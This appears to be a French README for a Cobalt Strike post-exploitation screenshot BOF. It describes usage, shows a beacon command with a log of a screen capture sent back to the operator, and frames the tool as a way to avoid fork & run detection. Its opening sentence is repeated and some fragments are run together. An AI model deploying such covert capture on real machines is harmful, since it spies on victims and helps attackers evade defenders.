
Une capacité de capture d'écran alternative pour Cobalt Strike qui utilise WinAPI et n'effectue pas de fork & run. Capture d'écran téléchargée en mémoire.
Une alternative pour la capture d'écran dans Cobalt Strike utilisant WinAPI sans fork & run. Capture téléchargée en mémoire.
make0 : capturer tout l'écran (PID = 0) PID spécifique : capturer un PID spécifique (fonctionne même en mode minimisé !)
screenshot_bof sans argument affichera une boîte de dialogue graphiquebeacon> screenshot_bof file.jpg 2 21964 0 90 100
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 12421 bytes
[+] received output:
Downloading JPEG over beacon as a screenshot with filename file.jpg
[*] received screenshot of Screenshot from Admin (26kb)
[+] received output:
Screenshot saved/downloaded successfully
Cobalt Strike utilise une technique appelée fork & run pour plusieurs de ses capacités post-exploitation, y compris la commande screenshot. Bien que ce comportement offre de la stabilité, il est désormais bien connu et fortement surveillé. Ce BOF vise à fournir une version plus sûre du point de vue OPSEC de la fonctionnalité de capture d'écran.
Avertissement habituel : je ne suis pas responsable des crimes contre l'humanité que vous pourriez commettre ou de la guerre nucléaire que vous pourriez provoquer en utilisant ce morceau de code mal écrit.